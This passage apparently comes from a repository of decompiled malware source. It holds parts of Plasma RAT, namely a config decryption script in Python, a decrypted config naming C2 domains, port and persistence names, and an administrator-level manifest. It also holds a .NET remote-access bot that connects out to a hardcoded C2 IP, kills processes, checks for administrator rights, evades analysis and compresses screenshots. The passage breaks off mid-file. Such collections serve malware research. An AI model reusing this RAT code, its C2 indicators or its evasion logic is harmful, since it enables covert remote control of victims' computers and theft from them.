5 | </SettingsFile>


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/My/MySettingsProperty.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel.Design;
 3 | using System.Diagnostics;
 4 | using System.Runtime.CompilerServices;
 5 | using Microsoft.VisualBasic;
 6 | using Microsoft.VisualBasic.CompilerServices;
 7 | 
 8 | namespace System_Configuration.My
 9 | {
10 | 	// Token: 0x0200001D RID: 29
11 | 	[StandardModule]
12 | 	[DebuggerNonUserCode]
13 | 	[CompilerGenerated]
14 | 	[HideModuleName]
15 | 	internal sealed class MySettingsProperty
16 | 	{
17 | 		// Token: 0x1700000D RID: 13
18 | 		// (get) Token: 0x060000BD RID: 189 RVA: 0x00002538 File Offset: 0x00000738
19 | 		[HelpKeyword("My.Settings")]
20 | 		internal static MySettings Settings
21 | 		{
22 | 			get
23 | 			{
24 | 				return MySettings.Default;
25 | 			}
26 | 		}
27 | 	}
28 | }
29 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Plasma_RAT_06_2016/StubAdmin.bin/System_Configuration/Resources.resources


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin/app.manifest:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 3 |   <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
 4 |   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
 5 |     <security>
 6 |       <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
 7 |         <!-- UAC Manifest Options
 8 |             If you want to change the Windows User Account Control level replace the 
 9 |             requestedExecutionLevel node with one of the following.
10 | 
11 |         <requestedExecutionLevel  level="asInvoker" uiAccess="false" />
12 |         <requestedExecutionLevel  level="requireAdministrator" uiAccess="false" />
13 |         <requestedExecutionLevel  level="highestAvailable" uiAccess="false" />
14 | 
15 |             Specifying requestedExecutionLevel node will disable file and registry virtualization.
16 |             If you want to utilize File and Registry Virtualization for backward 
17 |             compatibility then delete the requestedExecutionLevel node.
18 |         -->
19 |         <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
20 |       </requestedPrivileges>
21 |     </security>
22 |   </trustInfo>
23 |   
24 |   <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
25 |     <application>
26 |       <!-- A list of all Windows versions that this application is designed to work with. Windows will automatically select the most compatible environment.-->
27 | 
28 |       <!-- If your application is designed to work with Windows 7, uncomment the following supportedOS node-->
29 |       <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>-->
30 |       
31 |     </application>
32 |   </compatibility>
33 |   
34 |   <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
35 |   <!-- <dependency>
36 |     <dependentAssembly>
37 |       <assemblyIdentity
38 |           type="win32"
39 |           name="Microsoft.Windows.Common-Controls"
40 |           version="6.0.0.0"
41 |           processorArchitecture="*"
42 |           publicKeyToken="6595b64144ccf1df"
43 |           language="*"
44 |         />
45 |     </dependentAssembly>
46 |   </dependency>-->
47 | 
48 | </asmv1:assembly>
49 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/configdec.txt:
--------------------------------------------------------------------------------
1 | *dns.kingspy.info*5559*1111*MSchedExe.exe*Automatic Maintenance*zqiasy*kingspy.linkpc.net*


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/plasma_rat_image_summary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Plasma_RAT_06_2016/plasma_rat_image_summary.png


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/plasmacfg.py:
--------------------------------------------------------------------------------
 1 | #PLASMA RAT CONFIG DEC, f516ab1f1ca7a6545e1eadfa96bcb052
 2 | from Crypto.Cipher import AES
 3 | import md5
 4 | import base64
 5 | import binascii
 6 | config = "ua13wEBWaphPRD/VagsuZGWj/qM8fxdT4UyaNv"+\
 7 |          "jdAJT/8Wp/aCEtNtFnbo5GXhH3QdM0GmS4g1lc"+\
 8 |          "goE/TMqOSy3CNuckoUPOkRFbtkdYLYyxLl8HnY"+\
 9 |          "e8OXgMBwO2/zoG"
10 | passwd = "IUWEEQWIOER$89^*(&@^$*&#@$HAFKJHDAKJSF"+\
11 |          "Hjd89379327AJHFD*&#($hajklshdf##*$&^(AAA"
12 | k = md5.new()
13 | k.update(passwd)
14 | k = k.digest()
15 | print AES.new(k[0:15]+k+"\x00", AES.MODE_ECB).\
16 |                   decrypt(base64.b64decode(config))
17 | 
18 | 
19 | 
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sdfsdf", "sdfsdf\sdfsdf.csproj", "{98631528-0F7C-4B08-9024-FB15964B0656}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Debug|x86.Build.0 = Debug|x86
22 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|Any CPU.Build.0 = Release|x86
24 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|x86.ActiveCfg = Release|x86
27 | 		{98631528-0F7C-4B08-9024-FB15964B0656}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/-Module-{8AA6EFB8-4EF6-4D18-B36C-C300382F8161}.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x02000044 RID: 68
4 | internal class <Module>{8AA6EFB8-4EF6-4D18-B36C-C300382F8161}
5 | {
6 | }
7 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Classes/ClientRuleClass.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using RemoteClient.Polices;
 4 | 
 5 | namespace sdfsdf.Classes
 6 | {
 7 | 	// Token: 0x02000045 RID: 69
 8 | 	internal class ClientRuleClass
 9 | 	{
10 | 		// Token: 0x06000100 RID: 256 RVA: 0x00006494 File Offset: 0x00004694
11 | 		internal static void MoveError(int typemdt)
12 | 		{
13 | 			Type type = ClientRuleClass.stubMapper.ResolveType(33554432 + typemdt);
14 | 			foreach (FieldInfo fieldInfo in type.GetFields())
15 | 			{
16 | 				MethodInfo method = (MethodInfo)ClientRuleClass.stubMapper.ResolveMethod(fieldInfo.MetadataToken + 100663296);
17 | 				fieldInfo.SetValue(null, (MulticastDelegate)Delegate.CreateDelegate(type, method));
18 | 			}
19 | 		}
20 | 
21 | 		// Token: 0x06000101 RID: 257 RVA: 0x00002297 File Offset: 0x00000497
22 | 		public ClientRuleClass()
23 | 		{
24 | 			InvocationProcessPolicy.CompareError();
25 | 			base..ctor();
26 | 		}
27 | 
28 | 		// Token: 0x06000102 RID: 258 RVA: 0x0000284D File Offset: 0x00000A4D
29 | 		// Note: this type is marked as 'beforefieldinit'.
30 | 		static ClientRuleClass()
31 | 		{
32 | 			InvocationProcessPolicy.CompareError();
33 | 			ClientRuleClass.stubMapper = typeof(ClientRuleClass).Assembly.ManifestModule;
34 | 		}
35 | 
36 | 		// Token: 0x040000BC RID: 188
37 | 		internal static Module stubMapper;
38 | 
39 | 		// Token: 0x02000046 RID: 70
40 | 		// (Invoke) Token: 0x06000104 RID: 260
41 | 		internal delegate void UtilsMapper(object o);
42 | 	}
43 | }
44 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Descriptors/ParserSpecificationDescriptor.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace sdfsdf.Descriptors
 4 | {
 5 | 	// Token: 0x02000002 RID: 2
 6 | 	internal static class ParserSpecificationDescriptor
 7 | 	{
 8 | 	}
 9 | }
10 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/EnteryNameSpace/BotModule.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using System.Net;
 4 | using System.Net.Sockets;
 5 | using System.Text;
 6 | using System.Threading;
 7 | using RemoteClient;
 8 | using RemoteClient.Polices;
 9 | using RemoteClient.Schemes;
10 | 
11 | namespace EnteryNameSpace
12 | {
13 | 	// Token: 0x02000008 RID: 8
14 | 	public static class BotModule
15 | 	{
16 | 		// Token: 0x06000009 RID: 9 RVA: 0x00002958 File Offset: 0x00000B58
17 | 		public static void EnteryPoint(string[] Args)
18 | 		{
19 | 			int num = 0;
20 | 			for (;;)
21 | 			{
22 | 				if (num < 10)
23 | 				{
24 | 					goto IL_A3;
25 | 				}
26 | 				bool flag = false;
27 | 				IL_0B:
28 | 				if (flag)
29 | 				{
30 | 					try
31 | 					{
32 | 						BotModule._Args = Args;
33 | 						Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
34 | 						socket.Connect(new IPEndPoint(IPAddress.Parse(BotModule._Args[1].Split(new char[]
35 | 						{
36 | 							':'
37 | 						})[0]), Convert.ToInt32(BotModule._Args[1].Split(new char[]
38 | 						{
39 | 							':'
40 | 						})[1])));
41 | 						Product.tests = new RemoteClient(socket);
42 | 						Product.tests.Auth();
43 | 						while (Product.tests.clientState)
44 | 						{
45 | 							Thread.Sleep(1000);
46 | 						}
47 | 						Thread.Sleep(5000);
48 | 						goto IL_AD;
49 | 					}
50 | 					catch
51 | 					{
52 | 						goto IL_AD;
53 | 					}
54 | 					goto IL_A3;
55 | 					IL_AD:
56 | 					num++;
57 | 					continue;
58 | 				}
59 | 				break;
60 | 				IL_A3:
61 | 				flag = BotModule.needReconnect;
62 | 				goto IL_0B;
63 | 			}
64 | 		}
65 | 
66 | 		// Token: 0x0600000A RID: 10 RVA: 0x0000226C File Offset: 0x0000046C
67 | 		// Note: this type is marked as 'beforefieldinit'.
68 | 		static BotModule()
69 | 		{
70 | 			InvocationProcessPolicy.CompareError();
71 | 			BotModule.needReconnect = true;
72 | 			BotModule.id = Encoding.ASCII.GetBytes(Path.GetRandomFileName() + Path.GetRandomFileName());
73 | 		}
74 | 
75 | 		// Token: 0x0400001C RID: 28
76 | 		public static bool needReconnect;
77 | 
78 | 		// Token: 0x0400001D RID: 29
79 | 		public static string[] _Args;
80 | 
81 | 		// Token: 0x0400001E RID: 30
82 | 		public static byte[] id;
83 | 	}
84 | }
85 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | using System.Runtime.Versioning;
 7 | using System.Security;
 8 | using System.Security.Permissions;
 9 | 
10 | [assembly: AssemblyVersion("1.0.0.33")]
11 | [assembly: ComVisible(false)]
12 | [assembly: AssemblyTrademark("")]
13 | [assembly: AssemblyCopyright("gchnfgh")]
14 | [assembly: AssemblyFileVersion("1.0.0.65")]
15 | [assembly: Guid("bc1efc09-7765-4d8e-ad84-99c0c9935775")]
16 | [assembly: AssemblyProduct("wtery")]
17 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
18 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
19 | [assembly: CompilationRelaxations(8)]
20 | [assembly: AssemblyTitle("fdghfgxhfgh")]
21 | [assembly: AssemblyCompany("fbdfg")]
22 | [assembly: AssemblyConfiguration("")]
23 | [assembly: AssemblyDescription("werertg")]
24 | [assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
25 | [assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
26 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Properties/Resources.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Unk1/sdfsdf/Properties/Resources.resources


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.Configuration;
 4 | using System.Runtime.CompilerServices;
 5 | using RemoteClient.Polices;
 6 | 
 7 | namespace sdfsdf.Properties
 8 | {
 9 | 	// Token: 0x02000003 RID: 3
10 | 	[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.3.0.0")]
11 | 	[CompilerGenerated]
12 | 	internal sealed partial class Settings : ApplicationSettingsBase
13 | 	{
14 | 		// Token: 0x17000001 RID: 1
15 | 		// (get) Token: 0x06000001 RID: 1 RVA: 0x00002878 File Offset: 0x00000A78
16 | 		public static Settings Default
17 | 		{
18 | 			get
19 | 			{
20 | 				return Settings.defaultInstance;
21 | 			}
22 | 		}
23 | 
24 | 		// Token: 0x04000001 RID: 1
25 | 		private static Settings defaultInstance;
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 | <?xml version='1.0' encoding='utf-8'?>
2 | <SettingsFile CurrentProfile="(Default)" GeneratedClassNamespace="sdfsdf.Properties" GeneratedClassName="Settings" xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings">
3 |   <Profiles />
4 |   <Settings />
5 | </SettingsFile>


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Compression/JpgCompression.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Drawing;
 3 | using System.Drawing.Imaging;
 4 | using System.IO;
 5 | using RemoteClient.Polices;
 6 | 
 7 | namespace RemoteClient.Compression
 8 | {
 9 | 	// Token: 0x02000041 RID: 65
10 | 	public class JpgCompression : IDisposable
11 | 	{
12 | 		// Token: 0x060000FA RID: 250 RVA: 0x00006394 File Offset: 0x00004594
13 | 		public JpgCompression(long quality)
14 | 		{
15 | 			InvocationProcessPolicy.CompareError();
16 | 			base..ctor();
17 | 			EncoderParameter encoderParameter = new EncoderParameter(Encoder.Quality, quality);
18 | 			this._Role = this.RegisterMapper("image/jpeg");
19 | 			this.m_Token = new EncoderParameters(2);
20 | 			this.m_Token.Param[0] = encoderParameter;
21 | 			this.m_Token.Param[1] = new EncoderParameter(Encoder.Compression, 5L);
22 | 		}
23 | 
24 | 		// Token: 0x060000FB RID: 251 RVA: 0x0000280A File Offset: 0x00000A0A
25 | 		public void Dispose()
26 | 		{
27 | 			this.Dispose(true);
28 | 			GC.SuppressFinalize(this);
29 | 		}
30 | 
31 | 		// Token: 0x060000FC RID: 252 RVA: 0x00002819 File Offset: 0x00000A19
32 | 		protected virtual void Dispose(bool disposing)
33 | 		{
34 | 			if (disposing && this.m_Token != null)
35 | 			{
36 | 				this.m_Token.Dispose();
37 | 			}
38 | 		}
39 | 
40 | 		// Token: 0x060000FD RID: 253 RVA: 0x00006404 File Offset: 0x00004604
41 | 		public byte[] Compress(Bitmap bmp)
42 | 		{
43 | 			byte[] result;
44 | 			using (MemoryStream memoryStream = new MemoryStream())
45 | 			{
46 | 				bmp.Save(memoryStream, this._Role, this.m_Token);
47 | 				result = memoryStream.ToArray();
48 | 			}
49 | 			return result;
50 | 		}
51 | 
52 | 		// Token: 0x060000FE RID: 254 RVA: 0x00002837 File Offset: 0x00000A37
53 | 		public void Compress(Bitmap bmp, ref Stream targetStream)
54 | 		{
55 | 			bmp.Save(targetStream, this._Role, this.m_Token);
56 | 		}
57 | 
58 | 		// Token: 0x060000FF RID: 255 RVA: 0x00006450 File Offset: 0x00004650
59 | 		private ImageCodecInfo RegisterMapper(string reference)
60 | 		{
61 | 			ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders();
62 | 			int num = imageEncoders.Length - 1;
63 | 			for (int i = 0; i <= num; i++)
64 | 			{
65 | 				if (imageEncoders[i].MimeType == reference)
66 | 				{
67 | 					return imageEncoders[i];
68 | 				}
69 | 			}
70 | 			return null;
71 | 		}
72 | 
73 | 		// Token: 0x040000B9 RID: 185
74 | 		private readonly ImageCodecInfo _Role;
75 | 
76 | 		// Token: 0x040000BA RID: 186
77 | 		private readonly EncoderParameters m_Token;
78 | 	}
79 | }
80 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Mappers/DescriptorMapper.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Security.Principal;
 3 | using RemoteClient.Polices;
 4 | using RemoteClient.Tasks;
 5 | 
 6 | namespace RemoteClient.Mappers
 7 | {
 8 | 	// Token: 0x0200002A RID: 42
 9 | 	internal class DescriptorMapper
10 | 	{
11 | 		// Token: 0x060000BF RID: 191 RVA: 0x000025F9 File Offset: 0x000007F9
12 | 		public static bool AddMapper()
13 | 		{
14 | 			return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
15 | 		}
16 | 
17 | 		// Token: 0x060000C0 RID: 192 RVA: 0x00005B3C File Offset: 0x00003D3C
18 | 		private static bool ReadMapper()
19 | 		{
20 | 			bool result;
21 | 			try
22 | 			{
23 | 				string text = ProcessListenerTask.ViewMapper();
24 | 				string[] array = text.Split(new string[]
25 | 				{
26 | 					"\n"
27 | 				}, StringSplitOptions.None);
28 | 				if (array.Length == 3)
29 | 				{
30 | 					result = true;
31 | 				}
32 | 				else
33 | 				{
34 | 					result = false;
35 | 				}
36 | 			}
37 | 			catch
38 | 			{
39 | 				result = false;
40 | 			}
41 | 			return result;
42 | 		}
43 | 
44 | 		// Token: 0x060000C1 RID: 193 RVA: 0x0000260F File Offset: 0x0000080F
45 | 		public static void AssetMapper()
46 | 		{
47 | 			if (DescriptorMapper.ReadMapper())
48 | 			{
49 | 				Environment.Exit(0);
50 | 			}
51 | 		}
52 | 
53 | 		// Token: 0x060000C2 RID: 194 RVA: 0x00002297 File Offset: 0x00000497
54 | 		public DescriptorMapper()
55 | 		{
56 | 			InvocationProcessPolicy.CompareError();
57 | 			base..ctor();
58 | 		}
59 | 	}
60 | }
61 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Polices/InvocationProcessPolicy.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace RemoteClient.Polices
 4 | {
 5 | 	// Token: 0x02000047 RID: 71
 6 | 	internal class InvocationProcessPolicy
 7 | 	{
 8 | 		// Token: 0x06000107 RID: 263 RVA: 0x0000286D File Offset: 0x00000A6D
 9 | 		internal static void CompareError()
10 | 		{
11 | 		}
12 | 
13 | 		// Token: 0x040000BD RID: 189
14 | 		private static bool threadMapper;
15 | 	}
16 | }
17 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Properties/Resources.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using System.Globalization;
 6 | using System.Resources;
 7 | using System.Runtime.CompilerServices;
 8 | using RemoteClient.Polices;
 9 | 
10 | namespace RemoteClient.Properties
11 | {
12 | 	// Token: 0x0200002C RID: 44
13 | 	[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
14 | 	[DebuggerNonUserCode]
15 | 	[CompilerGenerated]
16 | 	internal class Resources
17 | 	{
18 | 		// Token: 0x060000C8 RID: 200 RVA: 0x00002297 File Offset: 0x00000497
19 | 		internal Resources()
20 | 		{
21 | 			InvocationProcessPolicy.CompareError();
22 | 			base..ctor();
23 | 		}
24 | 
25 | 		// Token: 0x17000003 RID: 3
26 | 		// (get) Token: 0x060000C9 RID: 201 RVA: 0x00005CB0 File Offset: 0x00003EB0
27 | 		[EditorBrowsable(EditorBrowsableState.Advanced)]
28 | 		internal static ResourceManager PrepareMapper
29 | 		{
30 | 			get
31 | 			{
32 | 				if (Resources._Reader == null)
33 | 				{
34 | 					Resources._Reader = new ResourceManager("RemoteClient.Properties.Resources", typeof(Resources).Assembly);
35 | 				}
36 | 				return Resources._Reader;
37 | 			}
38 | 		}
39 | 
40 | 		// Token: 0x17000004 RID: 4
41 | 		// (get) Token: 0x060000CA RID: 202 RVA: 0x00005CEC File Offset: 0x00003EEC
42 | 		// (set) Token: 0x060000CB RID: 203 RVA: 0x0000261E File Offset: 0x0000081E
43 | 		[EditorBrowsable(EditorBrowsableState.Advanced)]
44 | 		internal static CultureInfo ManageMapper
45 | 		{
46 | 			get
47 | 			{
48 | 				return Resources.m_Value;
49 | 			}
50 | 			set
51 | 			{
52 | 				Resources.m_Value = value;
53 | 			}
54 | 		}
55 | 
56 | 		// Token: 0x04000091 RID: 145
57 | 		private static ResourceManager _Reader;
58 | 
59 | 		// Token: 0x04000092 RID: 146
60 | 		private static object m_Value;
61 | 	}
62 | }
63 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Schemes/MapperProductSchema.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using RemoteClient.Polices;
 3 | 
 4 | namespace RemoteClient.Schemes
 5 | {
 6 | 	// Token: 0x02000009 RID: 9
 7 | 	internal class MapperProductSchema
 8 | 	{
 9 | 		// Token: 0x0600000B RID: 11 RVA: 0x00002297 File Offset: 0x00000497
10 | 		public MapperProductSchema()
11 | 		{
12 | 			InvocationProcessPolicy.CompareError();
13 | 			base..ctor();
14 | 		}
15 | 
16 | 		// Token: 0x0600000C RID: 12 RVA: 0x000022A4 File Offset: 0x000004A4
17 | 		// Note: this type is marked as 'beforefieldinit'.
18 | 		static MapperProductSchema()
19 | 		{
20 | 			InvocationProcessPolicy.CompareError();
21 | 			MapperProductSchema.m_Context = "51.15.22.167";
22 | 			MapperProductSchema.mapper = "";
23 | 			MapperProductSchema._Getter = "dsfdsfdsf.exe";
24 | 			MapperProductSchema._Property = "ewrertgrfg";
25 | 		}
26 | 
27 | 		// Token: 0x0400001F RID: 31
28 | 		public static string m_Context;
29 | 
30 | 		// Token: 0x04000020 RID: 32
31 | 		public static string mapper;
32 | 
33 | 		// Token: 0x04000021 RID: 33
34 | 		public static string _Getter;
35 | 
36 | 		// Token: 0x04000022 RID: 34
37 | 		public static string _Property;
38 | 	}
39 | }
40 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/Schemes/Product.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using RemoteClient.Polices;
 3 | 
 4 | namespace RemoteClient.Schemes
 5 | {
 6 | 	// Token: 0x0200000A RID: 10
 7 | 	internal class Product
 8 | 	{
 9 | 		// Token: 0x0600000D RID: 13 RVA: 0x00002297 File Offset: 0x00000497
10 | 		public Product()
11 | 		{
12 | 			InvocationProcessPolicy.CompareError();
13 | 			base..ctor();
14 | 		}
15 | 
16 | 		// Token: 0x04000023 RID: 35
17 | 		public static RemoteClient tests;
18 | 	}
19 | }
20 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/nagruz/sdfsdfdsg.Designer.cs:
--------------------------------------------------------------------------------
 1 | namespace RemoteClient.nagruz
 2 | {
 3 | 	// Token: 0x02000040 RID: 64
 4 | 	public partial class sdfsdfdsg : global::System.Windows.Forms.Form
 5 | 	{
 6 | 		// Token: 0x060000F8 RID: 248 RVA: 0x000027E5 File Offset: 0x000009E5
 7 | 		protected override void Dispose(bool disposing)
 8 | 		{
 9 | 			if (disposing && this.worker != null)
10 | 			{
11 | 				this.worker.Dispose();
12 | 			}
13 | 			base.Dispose(disposing);
14 | 		}
15 | 
16 | 		// Token: 0x040000B8 RID: 184
17 | 		private global::System.ComponentModel.IContainer worker;
18 | 	}
19 | }
20 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/nagruz/sdfsdfdsg.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | using System.Drawing;
 4 | using System.Threading;
 5 | using System.Windows.Forms;
 6 | using RemoteClient.Mappers;
 7 | using RemoteClient.Polices;
 8 | 
 9 | namespace RemoteClient.nagruz
10 | {
11 | 	// Token: 0x02000040 RID: 64
12 | 	public partial class sdfsdfdsg : Form
13 | 	{
14 | 		// Token: 0x060000F6 RID: 246 RVA: 0x000027CB File Offset: 0x000009CB
15 | 		public sdfsdfdsg()
16 | 		{
17 | 			InvocationProcessPolicy.CompareError();
18 | 			this.worker = null;
19 | 			base..ctor();
20 | 			this.PublishMapper();
21 | 		}
22 | 
23 | 		// Token: 0x060000F7 RID: 247 RVA: 0x000062EC File Offset: 0x000044EC
24 | 		private void StopMapper(object sender, EventArgs e)
25 | 		{
26 | 			DescriptorMapper.AssetMapper();
27 | 			for (int i = 0; i < 10; i++)
28 | 			{
29 | 				Thread.Sleep(500);
30 | 			}
31 | 			base.Close();
32 | 		}
33 | 
34 | 		// Token: 0x060000F9 RID: 249 RVA: 0x00006320 File Offset: 0x00004520
35 | 		private void PublishMapper()
36 | 		{
37 | 			base.SuspendLayout();
38 | 			base.AutoScaleDimensions = new SizeF(6f, 13f);
39 | 			base.AutoScaleMode = AutoScaleMode.Font;
40 | 			base.ClientSize = new Size(800, 450);
41 | 			base.Name = "sdfsdfdsg";
42 | 			this.Text = "sdfsdfdsg";
43 | 			base.Load += this.StopMapper;
44 | 			base.ResumeLayout(false);
45 | 		}
46 | 	}
47 | }
48 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/RemoteClient/nagruz/sdfsdfdsg.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Unk1/sdfsdf/RemoteClient/nagruz/sdfsdfdsg.resources


--------------------------------------------------------------------------------
/Unk1/sdfsdf/Resolver/DatabaseParserResolver.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using RemoteClient.Polices;
 4 | 
 5 | namespace sdfsdf.Resolver
 6 | {
 7 | 	// Token: 0x02000028 RID: 40
 8 | 	internal class DatabaseParserResolver
 9 | 	{
10 | 		// Token: 0x060000B8 RID: 184 RVA: 0x00005784 File Offset: 0x00003984
11 | 		public static void InvokeMapper(string var1)
12 | 		{
13 | 			try
14 | 			{
15 | 				foreach (Process process in Process.GetProcessesByName(var1))
16 | 				{
17 | 					try
18 | 					{
19 | 						process.Kill();
20 | 					}
21 | 					catch
22 | 					{
23 | 					}
24 | 				}
25 | 			}
26 | 			catch
27 | 			{
28 | 			}
29 | 		}
30 | 
31 | 		// Token: 0x060000B9 RID: 185 RVA: 0x00002297 File Offset: 0x00000497
32 | 		public DatabaseParserResolver()
33 | 		{
34 | 			InvocationProcessPolicy.CompareError();
35 | 			base..ctor();
36 | 		}
37 | 
38 | 		// Token: 0x0400008E RID: 142
39 | 		public static object m_Val;
40 | 	}
41 | }
42 | 


--------------------------------------------------------------------------------
/Unk1/sdfsdf/aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Unk1/sdfsdf/aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources


--------------------------------------------------------------------------------
/Unk1/sdfsdf/fdghdfghdfg/WindowsUtility.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | using System.Diagnostics;
 4 | using System.Runtime.InteropServices;
 5 | 
 6 | namespace fdghdfghdfg
 7 | {
 8 | 	// Token: 0x02000007 RID: 7
 9 | 	public static class WindowsUtility
10 | 	{
11 | 		// Token: 0x06000007 RID: 7 RVA: 0x0000288C File Offset: 0x00000A8C
